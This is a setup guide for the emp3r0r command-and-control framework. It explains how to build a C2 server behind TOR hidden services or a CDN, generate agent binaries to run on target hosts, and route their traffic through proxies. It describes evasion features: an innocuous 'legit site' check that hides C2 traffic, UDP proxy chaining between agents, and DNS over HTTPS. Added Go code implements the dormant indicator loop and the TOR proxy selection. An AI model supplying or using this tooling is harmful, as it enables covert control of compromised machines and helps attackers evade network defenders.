Getting started
This program includes a terminal UI that lets you navigate emp3r0r's features and control your targets (agents).
Currently, emp3r0r supports:
- Direct agent-to-CC connection over HTTP/2
- Connection through TOR via an external TOR proxy
- Connection through a CDN using websocket, with no external program needed
- Connection through an upstream proxy server (HTTP, SOCKS, etc.)
Under `./core`, run `./emp3r0r` and follow the on-screen instructions.
In the "additional CC server addresses" prompt, you can add multiple CC server addresses at once.
If you want the server certificate to be valid for multiple domains/IPs (for example, a TOR domain and a normal domain), add all of them as C2 addresses when prompted; each address you enter ends up in the certificate, so an agent pointed at any of them can verify it.
After running `./emp3r0r`, the C2 binary is built if it does not exist yet, and the emp3r0r interface is brought up with several tmux panes pre-opened and titled.
Type `help` to get started.
To use TOR, you have to set up a hidden service first.
Note: a TOR hidden service doesn't need a public IP address to work; the CC listener only has to be reachable from the local tor daemon, so you can run your service from anywhere.
Assuming your hidden service is configured as:
```
# /etc/tor/torrc
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 443 127.0.0.1:8000
```
TOR domain name:
```
❯ sudo cat /var/lib/tor/hidden_service/hostname
cc.onion
```
When your hidden service is ready, you can build the CC program as mentioned in Build CC.
To run your CC server: `./emp3r0r`
First you need a CDN that can forward websocket traffic for you. FYI, Cloudflare can do that.
This assumes you already know how to configure a CDN for your website. Here the CC server sits behind Nginx:
```
        HTTP2            websocket in TLS          websocket           websocket                HTTP2
agent ---------> socks5 ------------------> CDN -------------> Nginx -------------> CC websocket server ---------> CC
```
Nginx config:
```
# NOTE In `http://127.0.0.1:9000/ws`, `/ws` is hard coded in emp3r0r C2
location /emp3r0r {
    proxy_pass http://127.0.0.1:9000/ws;
    proxy_redirect off;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Host $http_host;
    # Show real IP. Behind a CDN, $remote_addr is the CDN edge node, not the agent;
    # the agent's address, if you need it, comes from the CDN's own forwarded header.
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
```
When your CDN and Nginx are ready, you can build the CC program as mentioned in Build CC.
To run the CC server with CDN support enabled:
```
./cc -cdn2proxy 9000 # 9000 is the listening port of the websocket server
```
One agent build should only be run on one target; running the same build on several targets makes them conflict.
In emp3r0r's console, type `gen_agent` to build agent binaries and follow the on-screen instructions.
Run the generated agent binary (under `./core/build`) on the target host.
When the target is connected, type `upgrade_agent`; the target will reconnect with the new version.
This is a URL that works like Windows's NCSI connectivity check; it is designed to hide the actual C2 traffic behind an innocuous request.
You can point this URL at some legit site such as https://github.com/jm33-m0/emp3r0r, or at other sites that are considered legit in your target network.
When this option is enabled, agents request the pre-configured URL and look for a certain text pattern in the server's response. If the pattern is found, the agent continues to connect to the actual C2 server; if not, it sleeps for a pre-configured time span and repeats the process. Until the indicator appears, the only traffic the agent produces is that one request to the legit site.
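The check-then-sleep loop described above, written out as an added Go example. This is not emp3r0r's own code; the function names, the 1 MiB body cap, the attempt limit and the local test server are assumptions made for the example. The constructed server stands in for the "legit site": it serves an ordinary page until the operator "switches on" the indicator, which here happens after two requests.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync/atomic"
	"time"
)

// indicatorPresent fetches indicatorURL and reports whether the response body
// contains pattern. A transport error or a non-2xx status counts as "not
// found": on anything ambiguous the agent stays quiet instead of reaching out
// to C2. Only the first 1 MiB of the body is inspected (assumed cap).
func indicatorPresent(client *http.Client, indicatorURL, pattern string) bool {
	resp, err := client.Get(indicatorURL)
	if err != nil {
		return false
	}
	defer resp.Body.Close()
	if resp.StatusCode < 200 || resp.StatusCode > 299 {
		return false
	}
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		return false
	}
	return strings.Contains(string(body), pattern)
}

// waitForIndicator polls until the pattern appears or maxAttempts is used up,
// sleeping for interval between attempts (the "pre-configured time span").
// It returns how many attempts were made and whether the indicator was seen,
// so the caller can decide whether to connect to C2 or keep sleeping.
func waitForIndicator(client *http.Client, indicatorURL, pattern string, interval time.Duration, maxAttempts int) (attempts int, found bool) {
	for attempts = 1; attempts <= maxAttempts; attempts++ {
		if indicatorPresent(client, indicatorURL, pattern) {
			return attempts, true
		}
		if attempts < maxAttempts {
			time.Sleep(interval)
		}
	}
	return maxAttempts, false
}

// flakyIndicator is a constructed local stand-in for the legit site: it serves
// a plain page for the first turnOnAfter requests and only then includes the
// marker text, simulating the operator enabling the indicator.
func flakyIndicator(marker string, turnOnAfter int32) http.Handler {
	var hits int32
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if atomic.AddInt32(&hits, 1) <= turnOnAfter {
			fmt.Fprint(w, "<html><body>nothing to see here</body></html>")
			return
		}
		fmt.Fprintf(w, "<html><body>%s</body></html>", marker)
	})
}

func main() {
	// Assumed marker; the real pattern is whatever gen_agent configured.
	const marker = "emp3r0r-go"
	srv := httptest.NewServer(flakyIndicator(marker, 2))
	defer srv.Close()

	client := &http.Client{Timeout: 5 * time.Second}
	attempts, found := waitForIndicator(client, srv.URL, marker, 100*time.Millisecond, 5)
	fmt.Printf("indicator found=%v after %d attempts\n", found, attempts)
	if found {
		fmt.Println("would now connect to the real C2")
	} else {
		fmt.Println("indicator never appeared, staying dormant")
	}
}
```

Treating a 404, a timeout or a refused connection as "not found" is deliberate: a blocked or sinkholed indicator site must leave the agent dormant, not make it fall through to the real C2 address.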
You can specify (hardcode) a proxy address in your agent binary when using `gen_agent`.
If you didn't do that, use `./agent -proxy 'socks5://ip:port'` instead.
Use UDP broadcasting to communicate with other agents and form a proxy chain to gain Internet access.
This can be disabled if you don't want the agent to send noisy UDP traffic (you can also adjust the time interval via `broadcast_interval_min` and `broadcast_interval_max`).
This is not a build-time option, but since auto-proxy has been mentioned, it is explained here as well.
It works like `ssh -R`: one connected agent initiates a connection towards another agent (one that cannot send outbound traffic) and uses that connection to provide a SOCKS5 proxy for the target agent so it can reach C2.
Use DNS over HTTPS in the agent to secure its DNS requests; you can opt out if this is not a concern or DoH is unavailable in the target network.
To run the agent with a direct connection to the CC server, just run `./agent`. If you want more control:
```
❯ ./agent -h
Usage of ./agent:
  -cdnproxy string
        CDN proxy for emp3r0r agent's C2 communication
  -daemon
        Daemonize
  -doh string
        DNS over HTTPS server for CDN proxy's DNS requests
  -proxy string
        Proxy for emp3r0r agent's C2 communication
  -silent
        Suppress output
```
Hardcoding these variables with `gen_agent` is recommended.
Likewise, build the agent with the onion domain name as the CC IP.
To run the agent, you have to run a TOR proxy first; a static tor binary is provided for this.
On your target, run `./agent`; it will automatically use the TOR proxy (`socks5://127.0.0.1:9050`).
Or, if you want to use a different TOR proxy, type `./agent -proxy 'socks5://addr:port'`.
Same build process; use your domain name as the CC IP.
`./agent -cdnproxy "wss://example.com/emp3r0r"`
Hardcoding the proxy address with `gen_agent` is recommended.
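The proxy selection that the `-proxy` option and the TOR run instructions above describe (an explicit proxy wins, an onion CC address falls back to the local tor SOCKS5 port, everything else connects directly), as an added Go example. This is not emp3r0r's code: the precedence rule, the function names and the accepted proxy schemes are assumptions for the example; only the default `socks5://127.0.0.1:9050` address comes from the page.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/url"
	"strings"
	"time"
)

// defaultTorProxy is the SOCKS5 listener of a local tor client, the address the
// page says the agent uses for an onion C2 when no -proxy is given.
const defaultTorProxy = "socks5://127.0.0.1:9050"

// isOnion reports whether ccAddr (a bare host, host:port or full URL) names a
// Tor hidden service.
func isOnion(ccAddr string) bool {
	host := ccAddr
	if u, err := url.Parse(ccAddr); err == nil && u.Hostname() != "" {
		host = u.Hostname()
	} else if h, _, err := net.SplitHostPort(ccAddr); err == nil {
		host = h
	}
	return strings.HasSuffix(strings.ToLower(host), ".onion")
}

// chooseProxy decides which proxy (if any) the agent uses for C2 traffic.
// Precedence (assumed for this example): an explicit -proxy value wins; a
// .onion CC address implies the local tor SOCKS5 port; otherwise (nil, nil)
// means connect directly. Only socks5, http and https proxies are accepted.
func chooseProxy(ccAddr, proxyFlag string) (*url.URL, error) {
	raw := strings.TrimSpace(proxyFlag)
	if raw == "" && isOnion(ccAddr) {
		raw = defaultTorProxy
	}
	if raw == "" {
		return nil, nil
	}
	u, err := url.Parse(raw)
	if err != nil {
		return nil, fmt.Errorf("bad proxy %q: %w", raw, err)
	}
	switch u.Scheme {
	case "socks5", "http", "https":
	default:
		return nil, fmt.Errorf("unsupported proxy scheme %q (want socks5, http or https)", u.Scheme)
	}
	if u.Host == "" {
		return nil, fmt.Errorf("proxy %q has no host:port", raw)
	}
	return u, nil
}

// newClient wires the chosen proxy into an http.Transport. Go's net/http dials
// socks5:// proxies natively and sends the target hostname to the SOCKS server,
// so a .onion name is resolved inside tor instead of leaking to local DNS.
func newClient(ccAddr, proxyFlag string) (*http.Client, error) {
	p, err := chooseProxy(ccAddr, proxyFlag)
	if err != nil {
		return nil, err
	}
	tr := &http.Transport{TLSHandshakeTimeout: 10 * time.Second} // Proxy nil: direct
	if p != nil {
		tr.Proxy = http.ProxyURL(p)
	}
	return &http.Client{Transport: tr, Timeout: 30 * time.Second}, nil
}

func main() {
	// Constructed cases; 203.0.113.10 is a TEST-NET address, not a real CC.
	for _, c := range []struct{ cc, flag string }{
		{"cc.onion", ""},                       // TOR build, default local tor
		{"cc.onion", "socks5://10.0.0.5:9150"}, // TOR build, explicit -proxy
		{"203.0.113.10:8000", ""},              // direct build
		{"cc.onion", "ftp://x:1"},              // rejected scheme
	} {
		p, err := chooseProxy(c.cc, c.flag)
		switch {
		case err != nil:
			fmt.Printf("cc=%s flag=%q -> error: %v\n", c.cc, c.flag, err)
		case p == nil:
			fmt.Printf("cc=%s flag=%q -> direct connection\n", c.cc, c.flag)
		default:
			fmt.Printf("cc=%s flag=%q -> via %s\n", c.cc, c.flag, p)
		}
	}
}
```

Rejecting unknown schemes up front matters because a mistyped `-proxy` that the transport silently ignores would send the agent's C2 traffic out directly, which for a TOR build is exactly the exposure the proxy was meant to prevent.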